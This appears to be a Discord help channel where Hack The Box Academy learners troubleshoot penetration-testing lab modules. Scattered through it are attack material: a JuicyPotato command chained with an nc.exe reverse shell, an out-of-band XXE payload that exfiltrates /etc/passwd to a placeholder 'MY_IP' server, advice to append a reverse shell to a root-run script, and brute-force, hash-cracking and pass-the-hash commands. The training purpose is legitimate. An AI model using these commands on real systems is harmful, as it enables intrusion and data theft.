#modules
Ngl dont pay attention too much to it until I have a connection problem 
Just pick everything that looks fast
It's too slow it's not working
Check your internet connection
Mmmm ok thanks a lot
Windows Evasion Techniques > Static Analysis:
Im bypassing AV according to log.txt but the flag isn't generating
same problem
I think they're very specific testcases
I'm retesting mine now
like the code inside really matters
Module : Introduction to Windows Evasion Techniques
Section : Static Analysis
the problem is that the flag is not generated
i don't know if it really matters because i am trying from 2 days
since i am able to bypass the static , the flag should be generated
Looking at the previous responses about this issue
it seems like the code is the problem
are you using c#?
Thanks! But when you send requests with that content type, you can't see the output because it's not blocked by the WAF and it doesn't appear in the logs. Am I wrong? How can I see the response to my payload?
Hi
That is not the bypass message.
it hasn't been 24 hrs you get to cater illegal bs like that
lol
I've never really seen a good AI detector. Put the American constitution in there and it'll be like 98%+
i guess the founding fathers used chatgpt
Also I have to delete that as you're posting content above t0
AI checkers dont even make sense ngl
someone pls help its been hours this POtato is not cooking....... windows priv esc assessment part 1....... here is what im trying can someone help......C:\Users\Public\JuicyPotato.exe -l 1337 -t * -p "C:\Windows\System32\cmd.exe" -c "{42CBFAA7-A4A7-47BB-B422-BD10E9D02700}" && C:\Users\Public\nc.exe -e cmd.exe 10.10.1x.x 1337
it says it works but creates no shell
the && is a whole new command outside of juicypotato.exe
pretty sure you need to include the command you want juicy potato to execute as arguments for the potato exploit itself, not a second command unrelated to it
thanks
correct
Hi everyone, im on the Active directory enumeration module and im following the tutorial for crackmapexec asreproast, however when i follow the instructions I receive this error message. Has anyone experienced this before?
crackmapexec ldap dc01.inlanefreight.htb -u users.txt -p '' --asreproast asreproast.out --verbose
Error resolving hostname dc01.inlanefreight.htb
Do you have dc01.inlanefreight.htb in your /etc/hosts file pointing to the target, and can you ping the target?
You must be connected to the VPN and put the host in your /etc/hosts file, those are the two primary reasons why you wouldn't be able to reach it. If you're not using the VPN you can use the pwnbox instead.
there will be new modules on the AI path ?
I believe they have said they are going to add more modules, yes.
nice hopefully they keep it on tier 2
Im using the pwnbox and i have the entry
[TARGETMACHINEIP] dc01.inlanefreight.htb
your error says you can't resolve the host, so i would double check the configuration in /etc/hosts
I think you also need the base domain
e.g
(TARGET IP) inlanefreight.htb dc01.inlanefreight.htb
Ah yep that was it. Thank you both
Anyone have a reason as to why the shell script for installing odat does not install odat?
./odat.py results in "no such directory hurrdeedurr"
you could try manually running each step to see where it fails
or maybe the people who are paid to write this shit maybe should like uhhh I dont know maybe keep on top of these things? for their paid service?
because im not seeing any indication of installation failure
worked for me
well thats great good for you
are you running it on a vm? maybe try the pwnbox if so
oh i think this is that pycryptodome issue i saw someone talking about
feel free to post in #1234357888114364508 if you believe something can be corrected
also sounds like you didn't cd into odat
I attempted to; the directory was not even made.
Does anyone actually build their own notes based on HTB Modules and Paths or do you just use alternate resources while you are going through the assessments?
most definitely take notes.
Anyone I can dm for File upload skills assessment? I am having issues with it.
you could DM me
Question... i am doing the module Information Gathering - Web Edition - Page 8 - DNS Zone Transfers
When i do a dig -x on the target ip provided i am not able to get the domain which would have allowed to later look for the ns records.
I understand the issue might be due to the ip being an internal ip.
How would you go about looking for the domain or ns records for internal ip
```
[★]$ dig -x 10.129.156.204
; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> -x 10.129.156.204
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 19260
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;204.156.129.10.in-addr.arpa. IN PTR
;; Query time: 3 msec
;; SERVER: 1.1.1.1#53(1.1.1.1) (UDP)
;; WHEN: Tue Mar 11 21:24:12 CDT 2025
;; MSG SIZE rcvd: 56
```
Just curious because these modules take a lot of time to take notes on, and with an assessment coming up, I'm looking for a quicker way to figure out the right approach when I'm unsure what method to use. Any tips on making this process more efficient?
what do you mean assessment coming up? CPTS is go at your own pace. everyone is different for learning, i think adult learners do better if they are hands on. writing your own notes and commands etc helps with memory retention as well, but ultimately it's going to be what works best for you taking notes. you don't want to speed run through it, you really need to understand the content.
you need to tell dig what ip to use as the dns @ip see the examples in the section, they should show using that syntax
The fact that it's an "internal" ip shouldn't matter if you're connected to the VPN or using the pwnbox
they likely used dig without specifying nameserver for it to search, so it defaults to public
told you yesterday how to fix
you need to adjust the timeout
bro it fixed man
your and mine time is different
?
everyone's time is relative
oh u say timeout i thinking u say fix u machine time, lol
bro how to specify timeout in this tool , i see help there is no such option.
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7
Well better get to reading it then
read what ?
Read the manual
reading the options
-w n damn .
I need help with Password Attacks , Pass the Hash, Q4 with davids hash, I passed the hash with mimikatz, but I keep opening a new session as administrator and not as David
how do i access the shared folder?
like there is no DC shares, i feel like this box is broken
how to clear database of bloodhound ...??
nah this is crazy, ive tried everything and there is no share DC01
Hi guys. Need some really specific help in something concerning the printnightmare vuln in the AD enum and attacks module. Please if someone is available in dm just let me know. Thanks.
Depends on the version.
Normal:
- Go to the panel on the top left
- Click on the left most tab
- scroll all the way down
CE - Click the settings tab
- Look for it on the left side bar
0xW1LD do you know how to solve the pass the hash question?
No, haven't touched that module
This living off the land section of AD can't be absorbed within just a day. There's so much info lol
Follow the first image from the very top of the section
You get partial access, so that's why you're still admin but you get access to the shared folder
if anyone could help with intro to whitebox command execution section that would be nice.
DM
Can someone help me on this module : Coercing Attacks & Unconstrained Delegation
How do I get into BOb again without an IP
There are IPs for the machines on Overview and Lab Environment section
Yes but it said some vary on module
Wait which one was Bob lol
Maybe Bob!=WS001
I think i was just overtired I think i can get it now
Aye why some people be having ruby gold and all them badges someone explain
Hi,
Can I track my progress on HTB Academy using the Student ID, and how?
I saw that it was possible via an API. How can we get an API token and documentation ?
From the third party meaning from the employer, I guess..
I tried but reach dead end as well, so i concluded it's for enterprise user. I may be wrong idk
Get some colour to your name by reading #welcome and follow the instructions there
for me it kept giving me the error 429 iirc
gave it like half an hour and it gave the same error
mightve just been an off day but it was the last thing i needed to finish the module and got on my nerves
Code 429: Too many requests
I'm trying to redo the Blind Data Exfiltration section to test a few things out since I was having trouble with the Skills Assessment at the end of the module. I remember this working on my first or second try when I initially did this section, but now that I've gone back I can't get the data from /etc/passwd or the flag at the end of the section to output into my terminal. I extracted the data using XXEInjection, but that tool isn't working in the skills assessment, so I'm currently trying to figure out what I'm doing wrong with the PHP server method.
My .dtd file:
```xml
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://MY_IP:8000/?content=%file;'>">
```
My request to the web app:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
  <!ENTITY % remote SYSTEM "http://MY_IP:8000/xxe.dtd">
  %remote;
  %oob;
]>
<root>%content; </root>
```
The output I receive on my terminal:
```
[Wed Mar 12 05:33:23 2025] 10.129.142.203:36428 Accepted
[Wed Mar 12 05:33:23 2025] 10.129.142.203:36428 [200]: GET /xxe.dtd
[Wed Mar 12 05:33:23 2025] 10.129.142.203:36428 Closing
```
According to the section, my output should be:
```
10.10.14.16:46256 Accepted
10.10.14.16:46256 [200]: (null) /xxe.dtd
10.10.14.16:46256 Closing
10.10.14.16:46258 Accepted
root: x :0:0:root:/root:/bin/bash
daemon: x :1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin: x :2:2:bin:/bin:/usr/sbin/nologin
...SNIP...
```
My index.php and xxe.dtd file are both in the same directory as the PHP server I'm opening. I'm not really sure what I could possibly be doing different than what I did the other day when it worked.
Also, here is my index.php file:
```php
<?php
if(isset($_GET['content'])){
    error_log("\n\n" . base64_decode($_GET['content']));
}
?>
```
@dry falcon - do not spoil credentials. Just ask a question with a reference to a module and section.
i added **** in it
I am going back through CPTS modules and I could have sworn there was a section on ntlmrelayx.py . Am I dreaming or was it removed ?
If I remember right it was removed when they released the NTLM Relay Attacks module
[25][smtp] host: 10.123 login: abc@try.htb password:mypass
how to access all mails ?? using these id:pass
is it ok
Read the second part too - still missing the module and section
Name the module and section please. Clicking a link on mobile is a pain in the ass.
done
the hack the box domain caught me up a bit then
was a skill issue
I thought the syntax was
dig @<nameserver> <domain> AXFR
isnt @<nameserver> supposed to be something starting with ns instead of an ip.
that was the example that they had dig axfr @nsztm1.digi.ninja zonetransfer.me
Generally nameservers are named ns~~~ to identify that they are name servers however you can still use the ip
why command are not working and when i run in pwnbox it work what the hell.
https://academy.hackthebox.com/module/116/section/1169
Attacking SQL Databases
Ad Enumeration module with petitpotam
ok I'm at a brick wall.. please help.
I'm doing the web attacks skills assessment and I have escalated privileges and have currently tried everything I can think of to parse XML using XXE to get some sort of info or the flag. I'm receiving a null output with many various payloads rather than the string, and I've identified how the payload needs to be constructed to receive the null output, but I can't receive any info in the output. I'm assuming the payload is executing properly, but I can't get any oob attacks to work to grab any files.
for password attacks - I'm on password reuse / password default
For the sql question - it mentions to use the previous credentials to find the sql login... Just want to make sure I'm not going crazy, does it want me to mutate the last questions credentials for the login? I ran an nmap and don't even see sql running... A bit confused here and nudge would be great
i assume you have already checked the xxe and its working with a plain text
correct
I would check if the previous creds work for any external services first.
hi all, getting terrible latency to academy. issue persists on both EU and US VPNs
anyone aware of any fixes? VPN is using TCP
did you double check the syntax? are you dumping on base64?
as the file you are trying to get might be crushing the xml, if I did not explain myself properly
id use a wrapper instead
ok thank you very much @waxen totem . I did not know.
I tried that, and it didn't work, but I actually finally figured it out.
what was it?
I haven't solved it, but I figured out my problem. I've been adding % instead of & at the beginning of my entity references for the past few hours. At least I can start to figure out how to solve this

well damn
Hi all, I am currently attempting AD Enumeration & Attacks - Skills Assessment Part II
I have compromised the MSSQL server and exploited it. I am attempting to extract the hash using Mimikatz, but the hash provided to me is wrong. I used netexec commands to exploit + obtain reverse shell + upload necessary files.
damn i feel really dumb. I probably would've benefited from just sleeping on it, live and learn I guess
% is for other case
when u cant join external and internal entities
plus u dont have to feel dumb, its studying
true. Thanks 
also make sure u make good notes
helps alot
taking breaks sometimes is also great
Oh yeah my notebook has been filling up. I'm trying my best to keep them succinct, but there's so much info it can be hard sometimes. My note taking has improved somewhat so I'm sure I'll get better at that as time goes on, too
what are u using for note taking
KeepNote
word I'll look into that
thank you
you're welcome
if I'm building with the vs studio and it says it needs the built dll with it how do i change config to only need the exe itself
Hello everyone
hi @rotund oak
Anyone done AD trust attacks recently? For Cross Forest attacks when SSH over to the target the shell isn't stable, when the shell gets to the bottom of the screen it doesn't scroll up and the next command just overwrites the bottom line, the buffer is set to 9999 and won't let me change.
same problem here. If you get the answer please let me know, I already used mimikatz, msfconsole and lazagne nothing worked
Hi all! I'm doing the windows evasion techniques module and I'm stuck at the LOLBAS: RunDll32 section. When I compile I get the error CS5001 "Program does not contain a static Main method suitable for an entry point". Does anyone know what I can do?
I can check the hash and let you know if it is indeed wrong. Can send a DM.
You can DM if you'd like. You probably just need to do a little more enumeration.
Just DM
we don't do that here lol
I wanted to ask a question
Right now in the active directory enumeration & attacks
I find my self understanding everything and not taking much time in the questions given
however i can't really solve anything till i copy and paste the commands like i mostly don't write anything
is that okay or should i be able to write the commands myself?
you should be able to apply the concepts and skills you've learned in order to solve the exercises and the skills assessments
you are not going to remember commands most of the time so you can use a cheat sheet
there should be one provided in that module
I would say that if you have to copy paste if it's a basic/simple command, then you're likely not understanding the command
at some point you should be able to type some basic commands but you're not going to remember the long commands
or maybe you will
Well yeah it's just frame of reference type of thing
like setting up an SMB server for transferring files in your current dir -- sudo smbserver.py -smb2support share .
If you know which command/one-liner you need, sure
But if you need to blind copy/paste until it works, no
Greetings hat
Hi
hi
prime_eagle you can quit DMing me.
Check your box
Read the #rules dming without consent is a quick way to get yourself booted from the server
Hello
Thank you marcielee and calculac0re
Is there a known issue with Windows Targets? Mine comes online but then gets unresponsive as I log in using xfreerdp
hello everyone,
I am a newbie learner from HTB, and i am confused in choosing modules.
i am currently using linux as my main OS.
please help!
choose a job role path instead @rustic sage
i am thinking of taking linux fundamentals
you can try finishing all Tier 0 and I modules before enrolling into a job role path
or choosing a skill path
Take your time
thank you, for helping me
linux fundamentals is the pre-req to pentester
the more you understand, the easier it becomes for the later modules
no problem, welcome
i think skill path will boost my resume
Black screen? Press enter
Hey is anyone else having a hard time fuzzing the /admin directory using burp in the "Using web proxies" module?
what do you want to work towards?
network
then you should probably start with the Information Security Foundations skill path, then you can pivot to the Penetration Tester job role path
ok, i will see that
thank u for giving ur time
can anyone assist with hash crack for Windows priv esc assessment II? have the hash but cant find a wordlist when using hashcat.
Can just go with rockyou, but if its something you can just PTH with, why not just PTH?
sometimes there's a wordlist provided in the 'resource' tab
Not every hash can be cracked.
You may have to use the hash in another way
After escalating privileges retrieve the NTLM hash for this user and crack it offline. Submit the cleartext password for this account.
Yeah just try rockyou, unless there is a provided wordlist in resources like Uncommon mentioned.
Anybody seen this? Tried on two VMs but getting same issue, reset the lab a few times too
Hi guys for Pass the Ticket Linux, there are 2 krb5 tickets for julio, one of them is expired and the other one, when I try copying it, it says the file doesnt exist, so I'm kinda lost tbh
have you tried cracking it on a website
there are websites
all them require registration
Not sure but sounds like the path is wrong if it can't find a file, checked cases in the path?
yeah it was totally wrong, I fixed it
it respawned, the name of the file into something else, when i did ls -la /tmp again
Yeah would have caught me too ha
find /usr/share/seclists/Passwords/ -type f -name "*.txt" -exec cat {} + > combined_wordlist.txt
hashcat -m 1000 -a 0 admin_hash.txt combined_wordlist.txt --force
still nothing....threw every wordlist in seclist directory and subdirectory at it
windows priv esc assessment part II
no actually im stupid, so the wrong one, is expired but when I use it and then do ls -la /tmp file, another ticket under julio arrives, but if I respawn target, the command shows the expired one and another ticket which is basically has no credentials in it
You can DM.
I'm so confused
@tired atlas what HTB path is it in?
Pass the Ticket Linux, under Password Attacks
I'll show you what i mean here
the HRJDUX one I highlighted in white is expired
the one under it is invalid
Ah I've not done that module, thought it might be in the CAPE path. Are you copying them from a windows box? They should have a .ccache extension I think on Linux?
That's probably considered a spoiler.
but they dont
What are you running/trying to do? If they are from a windows box you'll have to convert them
They'll be steps in the module if you do, sometimes the SA mix different parts you've been shown before
its from a linux box, and I'm trying to get that ccache file and use it to impersonate Julio
were there no other files or anything in the lsass?
doesnt look like youre in the /root directory
oh snap
even if I do go to the root directory, this shows up, for the other ticket that I want to use
did it get replaced?
how do I know that
by checking tmp for the file
nope cant cat it
then it changed
OH MY LORD
what do i do then
got it
I just used the expired ticket, then ls -la /tmp, to find new changed ticket and that worked woohoo
hi
File Upload Attacks
Page 11
Skills Assessment - File Upload Attacks
Skills Assessment - File Upload Attacks , I tried to find the hidden directory of the file uploaded with Burp Suite but could not find a way to activate the shell , can anyone help?
smbclient -U bob ////10.129.13.178//users
password for {WORKGROUP/bob}: "Welcome1"
do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)
Service Scanning
Probably too many forward slashes
Instead use backward slashes
Too many forward slashes \\\\ is equivalent to //
@coral plank this channel isn't for help with ctfs, if it's active then you're just gonna have to wait
This channel is for help with htb academy modules
@fathom pendant I am literally sorry, I won't do it again.
I got 2 hours and got no hint to get the flag :/
Try to exploit the upload form to read the flag found at the root directory "/".
@nimble scroll you could DM me for the file upload attacks skills assessment.
thank you for the answer
somebody can help me in dante prolab
facing a breaker while pivoting through chisel
You need to use the vpn
Learn how to connect to the VPN and access Machines on HTB Labs.
#1263635449335910531 if you dont have access get verified, instructions --> #welcome
How do I connect to BoB in windows attack and defense challenge : PKIesc1
I am only given 1 IP and that's for Kali
The static IP for WS001(Bob?) doesn't work for me
connect to kali then connect to bob through kali
@hallow kiln no It was Just completely Frozen, got It to work After 2 resets
in hydra, i can do : ftp://<IP>
or i do: <IP> ftp , correct ?
protocol://ip works
otherwise you'd specify the protocol directly after
hydra ftp ip
yes thank you
also , can someone provide me the solution for this ? man i am brute forcing all services found on the host but cant get the password -_-
and the list is 7k lines long
its Password Mutations in Password attacks
meh its okay
i will just continue And let the bruteforce run by itself
did you try using a mutated password list as instructed by the module?
Yes
did you mutate the password.list with the given custom.rule?
as in the one from resources, not the one from the reading
the total mutated list should be ~94k words, not ~7k
Sorry I typed wrong
yes
I also remember that ssh attacks are really slow
I will go to like 8 threads ?
but this module also exercises patience, it's one of the few that breaks the "if it's not cracked in 5 minutes, you're doing something wrong"
48 was the sweet spot for me
i will note that down on my cheat sheet
i believe the guide uses like 52
i think on the machine nibbles i got banned when i tried to brute force
after that i didn't like it
you didn't need to brute nibbles
I have a problem in nibbles, i accidentally messed the monitor.sh script up because i forgot to adjust the command to my ip and then i tried to vim it to get it right but something went wrong there.
you cannot edit the file anymore ?
I can but there is already a line for the reverse shell with the wrong ip before the one with my ip
will that not matter if i just add the correct line at the end?
run sudo -l
make sure the path to the sh is correct,
Patience is the solution
and then you can empty the file completely , and run bash -c '#reverse shell here'
As long as the correct line is at the end it won't matter
But dont forget to not delete the first line , so the system knows that its a bash file
Thats not good practice
Alright thank you both!
hmm why? wouldn't it work?
You want as minimal disruption as possible, deleting the whole file would be noticed fast
I was just echo /bin/bash >> monitor.sh to got root access
i see
Just append the reverse shell at the end, you suggest
I am really lucky to be in this community Learning alot
Hello there! Just finished Skill assessments for the Shells module, I have a question about the first host. There are two vectors of entry, and one of them needs credentials, given in the hint about the first host. Is there a way to find those credentials without looking at the hint ? They were not the default ones, so I'm wondering.
Correct, typically deleting client files is out of scope, as well the module also talks about creating a backup of the file
i have a question
Yesterday i tried to try escalate privileges on old sudo, but then it asked me for a password to run the file (it asked the password of the current user) but i didn't have it
How can i see exploits that i can actually use ? is there a way to filter them ?
I think i need to first complete the whole course and then start with ippsec's guides to get the hang of it
Making a backup would be a better choice
Wydm old sudo
for example there is a shell script for privilege escalation for sudo versions between 1.8 and 1.9, this is what i mean
It's just a matter of knowing what and where to check
The linux privesc module covers this
But that's later in the path
Actually, the second host also has a set of credentials in the hint section that I'm not sure how to get another way... :/
Desktop of the jump host
Typically running sudo requires a password, if you don't have the password then assume sudo exploits are out of the question
Wow, thank you. Seems like a silly question now.
missing the forest for the trees :)
Since there's a similar file on the PwnBox Desktop with no "task related credentials", I didn't think those might be different. Will know next time I have to use one though
the credentials on pwnbox is the credentials to log into the pwnbox externally; such as via ssh
pwnbox is independent to the given lab environment
Yeps! It definitely makes sense, I just shortcuted and wondered where was the recon work talked about in the skill assessment intro
Won't make the same mistake I hope!
you're not the first person to completely miss the obvious, since you're so hyped and prepped to just attack the boxes
Definitely yeah. Should have taken more time to assess and recon, let this be my lesson for the future
there's a few cases in other modules where the important text file is just right there when you rdp in 
I would be surprised of the module told you to modify your resolv.conf file, have you tried the normal way with just adding the hosts to /etc/hosts?
Also please make sure not to post content from modules above tier 0
module is asking for it yes
Sorry, but I really just wanted to show the problem
You can ask without revealing info though. I see that and it worked fine for me, but I didn't use the FQDN just the hostname.
that's what i'm doing with bloodhound
dc ACADEMY-EA-DC01
try without proxychains, the module shows it without, that's the way i did it and it worked
I did without and that's working, but I wanted to do with proxychains because in real Ops I will be using proxychains
in real ops: it'll depend
in real ops i don't think you'd be pivoting through another attack box
wouldn't you just use the attack box already connected?
i did so to complete the section, but I wanted to know why proxychains wasn't working
Anyway, I will pass to next section
there's also pivot tools that don't rely on proxychains
like ligolo-ng, and ligolo-mp
it seems like even if we're root we can't use klist on the non-expired ccache file unless it's in the root directory for whatever reason
like it didn't work when i set the env variable to "/tmp/...." but it did when it was "/root/..."
weird
maybe it has to do with the fact that i was the "root" user so i needed to specify my directory (root/) to the env. variable
well nevermind everything i wrote, the location of the file has nothing to do with needing to be in the user's directory
does anyone know why i couldn't export the ccache file's filepath in the KRB5CCNAME environment variable? was it because it was in /tmp?
shouldn't matter too much if it's in /tmp/ did you use the full filepath?
i just killed my pwnbox so i can't check my history but maybe i didn't yeah
but i mean as long as i know the filepath doesn't have to comply to certain rules as long as it's the full filepath i'm fine lol, thanks
in general: best practice for environment variables is full filepaths
all of them till you find it, doesn't take that long

Most of them'll end pretty quickly anyway
Actually Imma save you some time now its not in that list
the answer is in the format of b.a.inlanefreight.htb where a.inlanefreight.htb is one of the subdomains, i suggest doing a dig axfr on the base domain first instead of jumping straight to the list/bruteforce
Okay , thanks alot for the hint , atleast am assured i wouldn't wait till eternity.
what machine can i use to practice ADPowerview
do you mean boxes in the lab or a module?
labs like machines for CTF challenges
i don't have access
I said how to get access in the same reply...
@cloud urchin I got it thank you !
Hey, does anyone know why Academy has quite often issues with deploying the target? I have apparently the issue that it deploys forever and I cannot continue :/
Try pressing CTRL+SHIFT+R
I did, it did not help
try spawning it in another browser or changing vpn servers. if you change vpn servers press CTRL+SHIFT+R again before you spawn the target after you connect to the vpn.
I don't connect to vpn, I usually use the attack box
Another browser also doesn't work
Okay try changing servers or regions then.
Also, maybe disable any extensions you may have, especially ad blockers.
Also doesn't work, this is now the 5th time I am facing such an issue, really not cool
Best to reach out to support on the website then.
Yeah but please try to fix that internally also
I'm not HTB staff. Did you try changing servers like I suggested?
Oh apologies haha yeah I did
i just tried to spawn the target and was successful
it's very likely something on your end
Hmm Strange
Please try re-asking your question without spoiling content from the module
if I don't put the detail, how can someone help me?
Ok Works now
But now I have another error, I need to connect to the DC and get the following:
People have done the module. You don't need to post content from the module to write a question that contains detail.
First, Windows AD environments can take a good 5 mins to fully spawn even if the target is up. Second you need to wrap your password in quotes.
It's up for about 40 mins xD and also with quotes I get the same error
Or do I need to put away the eagle?
172.16 is a secondary internal network
there's likely a first target to go through
oh yeah good catch that too
i.e. an attack box --> windows target
Okay and in the windows target then again xfreerdp?
i believe this module has the starting machine 10.129.x.x as a kali box then another internal network target which would be the eagle\bob windows machine
anyone getting blackscreen while rdp(ing) to the target machine (module - ACL Abuse Tactics)
Yes correct I am in the eagle\bob windows machine now
press enter
do whatever the section is detailing you to do
i wasted 10 mins lmaoo. it worked thanks
thinking its loading something maybe
you can search the channel for people with the same issue
it's actually failing to load/draw the corporate AUP screen
Academy should include emulations of networking device cli's in their networking modules including simulating using a faulty serial cable 
Yeah that was it, connecting to bob first and from there to the DC my goodness they could have mentioned this….
it's kinda how any AD lab is set up in the modules and was likely mentioned in the beginning
has anyone run into an issue downloading from one of the lab ftp servers?
Specifically the ||"Password Attacks Lab - Easy" module
I can connect with credentials|| via an ftp client but the download is stalled at 0%. I've tried ftp curl wget. I tried switching vpn servers.
I seem to be able to interact with other (non-htb) ftp servers fine.
it worked fine for me previously
try reconnecting to the vpn; sudo killall openvpn and reconnect
Had the same issue. TCP version of the VPN solved it for me
thanks for the suggestions, unfortunately neither ended up working.
i saw this reddit thread reporting the same problem https://www.reddit.com/r/hackthebox/comments/1aevwl0/stalled_ftp_downloaded/ but it had no resolution
perhaps someone else is just hammering the server to the point of DoS? even though I just spun it up? I might have to try later
no one else should be able to hammer your target
so that's just not even in the cards
oh really? I thought we were all on the same network. like the target IPs are just announced to us individually, but still accessible by others. maybe i'm misunderstanding the environment
nope it's similar to the VIP+ package on htb labs; all the private ip range targets are only accessible to you
it would massively hinder learning if other people could mess with your target
ah that makes sense
guess I'll have to troubleshoot this ftp issue further then
Try adjusting the VPN interface(tunX)'s MTU
this affected some people's ssh experience and might affect that as well
I'll try that. i'm at 1500 atm, maybe half it?
Just a hundred in either direction would do wonders
welp,
I went to 1600, didn't work
went to 1400, worked
went back to original 1500, worked????
technology is amazing
help me please 
that?
Just ask your question instead of asking for help
I'm doing hack the box as a newbie and it tells me to put the Apache version
I put the version and it gives me an incorrect answer
Which module and section?
web requests
HTTP Requests and Responses
that's what it's called
aight so what response are you getting?
I don't know what the X.Y.ZZ format is.
It means just put the version numbers...
I'm an idiot I know XDDDDD
Thank you very much too

I am currently stuck at attacking common services modules attacking database section. I know this shouldn't be that frustrating but still I am very annoyed by the last question. here's what I did so far
- log in with given user with impacket mssqlclient.py
- got the hash of the service user
- logged in with mssqlclient.py
- use the flagDB to select the database
That's it. I can't move forward, every command I type returns nothing. tried the commands from the modules, saw the forums, got some commands, but it just doesn't return anything.
any help would be helpful.
try using impacket-mssqlclient.py
instead of just mssqlclient.py
sometimes it's a bit buggy
Hello
im finishing up the getting started guide of the penetration tester module and im doing the knowledge test. I have experienced some lag using the built in vm so i wanted to try to connect to the vpn and using my own vm.
All i have to do is connect to the vpn and i should be able to reach the host right?
Because i did that and i cant ping the host im given, it says Destination Net Unreachable.
are you running the pwnbox at the same time?
No
did you ctrl-c after connecting bc the "terminal froze"
once you get the Initialization Sequence Completed message, you open a new terminal and leave that one alone
otherwise:
Need to speak to a person? Learn how to reach our support via HTB Labs.
OOhhh, i connected my actual laptop to ovpn not just my vm
should i connect inside my vm?


connect from vm instead
while you can do some shenanigans to use host vpn adapter; it's a lot more trouble than it's worth
alright thanks!
Multiple interface bridge dance party
is there a guide anywhere for the right way to connect because i feel like im doing something wrong
nevermind got it!
Anyone done "Trust Account Attack" in AD trust attacks? You are told to ssh via proxychains but my shell stops scrolling when it reaches the bottom of the screen
Does anyone know how to raise a ticket/report an issue with a lab?
Need some help? Learn how to reach the support team on Academy.
Does anyone know why i cant download something from github to my pwnbox from HTB
I can ping sites but i can not curl them or visit them in browser
free pwnbox has limited internet access
ah okay but how are you supposed to get files onto it then?
should be able to git clone
alright, buying a membership after this box then haha
but i never bothered too much with it, had my own vm set up and never thought about it
Someone who managed to pass the skill assessment lab at "Evil-Twin" module?
I need some help about the exercise
for the question
In networking, what term describes the communication pathways (wired or wireless) that connect nodes?
the response is medium ?
but they say no, can someone help me please
hi, quick question
why is it that my own VM tend to process way slower than the pwnbox provided
for example it only took 5s for hydra to find the password on pwnbox however its taking forever on my own VM
thanks!
hey guys, can someone help me with this question of "Password Reuse/Default Passwords" section of "Password Attacks" module. The question in which we have to find the default 'mysql' creds, I have found this resource 'https://github.com/gauravnarwani97/MySQL-default-credentials/blob/master/default_db_credentials1.txt' containing default creds for mysql then to perform password spraying mysql using hydra 'hydra -C user-password.txt mysql://target's_IP' but the target's 3306 port is not running, even tried the 'mysql_login' module of msfconsole still showing the port is closed also confirmed through nmap scan
I don't recall that one exactly but maybe mysql is running locally?
if you're talking about the material or method itself, medium is fine
maybe they want a more specific term
so how do we know the default creds for mysql ? out of the many listed on the website
I'm pretty sure there is a list in the section or a way to get them.
Focus on the service
mysql is running internally; and you can search the list for mysql; they give you a default-cred-cheatsheet to use though
feel free to DM
@plain radish your screenshot contained spoilers
meaning?
should I have blurred the flag part?
It contained spoiler info/answers to the module/section
Just be mindful in the future
I will for sure
Can someone provide a hint for windows privilege escalation - other files assessment please ?
does anyone have any idea why when i use sqlmap, despite being as a dba with file permissions, i still can't read or create files anywhere on the machine?
what are some things i can look for?
https://academy.hackthebox.com/module/147/section/1359
I got the password in cleartext, but when i submit it it says incorrect, but its the password
Q: Apply the concepts taught in this section to obtain the password to the Vendor user account on the target. Submit the clear-text password as the answer. (Format: Case sensitive)
wtf
after i manually typed the password it worked
strange
i wanted to ask something if someone is at the very begining of cyber security but has a basic knowledge of software engineering stuff from where should he start (academy, labs, something else) and where exactly in one of those
im doing it soon!! thank you
Has anyone had any issues with chisel and proxychains using crackmapexec?
Can someone provide a nudge for windows privilege escalation - other files lesson assessment please ?
Hi, I have an HTB account with my student payment but I can't access the path and the modules section. I already finished my information security information foundations paths and being a student I might have access to the pentesting path and bug bounty
how many cubes is it to 100% academy
Like in the cme module?
can i get some help with networking fundamentals module?
Which protocol manages data routing and delivery across networks?
i've done the whole module but this seem to not accept any syntax
Yes! I'm doing the Stealing hashes CME module where the target machine is already running chisel. I connect to chisel from my end but I cant find 172.16.1.10
└──╼ [★]$ sudo chisel client 10.129.149.117:8080 socks
2025/03/13 10:57:40 client: Connecting to ws://10.129.149.117:8080
2025/03/13 10:57:40 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2025/03/13 10:57:41 client: Connected (Latency 10.605141ms)
┌─[us-academy-1]─[10.10.15.119]─[htb-ac-1524803@htb-wtd4awftne]─[~]
└──╼ [★]$ proxychains4 -q crackmapexec smb 172.16.1.10 -u grace -p Inlanefreight01! --shares --verbose
[10:58:21] INFO Socket info: host=172.16.1.10, hostname=172.16.1.10, kerberos=False, ipv6=False, connection.py:160 link-local ipv6=False
[10:58:25] INFO Failed to create connection object for target 172.16.1.10, exiting...
not Internet protocol, IP/v4/v6, OSPF, BGP, RIP/V2, eigrp, igrp
none work
I only used it on the Skills Assessment and when I did, I set my proxychains config to socks5 and used sudo with proxychains. Can try sudo first and if that doesn't work can try socks5 if that doesn't make sense, you can DM.
That was it!.... Sudo made the difference for me. bizarre. Thank you so much.
please im stuck like hell
yea you might have to try later, i'm getting ignored for my questions as well.
Hi there. I'm doing the SIEM visualization example 4 and have a question: how can I get the correct date? The date I'm seeing seems to be invalid. And timestamp always shows up as @timestamp per week. I can define a "customize time interval" of for example "24 hours" or "1 days", but that doesn't seem to change anything.
Are you still stuck on this one? Have you tried everything in the section? I have to get back to work, so if you are still stuck, I'd focus on the sticky part of the section.
Hello. Working on "Skills Assessment - File Upload Attacks" but it seems I'm only getting GET requests from the web form upload and the entire module was focused on POST requests, am I missing something obvious here?
@solar hedge you could DM me
have you tried all buttons?
wow I feel dumb. Thanks, didn't even notice.
thanks for the tip, I've searched the sticky section of the current user but perhaps i'll try other users or try a different terminal type ( powershell v. dos.exe)
Current user should work. That assessment doesn't throw any curve balls.
Can DM if you still can't get it, I can multi task.
Okay, really appreciate the help, thanks a ton!
any recommendations for free cloud vm hosting? Looking to run a Kali or Parrot that I can access from my MacOS or Windows
Has anyone completed the Windows Priv Esc module? Seeking some info on the "Interact with Users" section
Like just a question about the section?
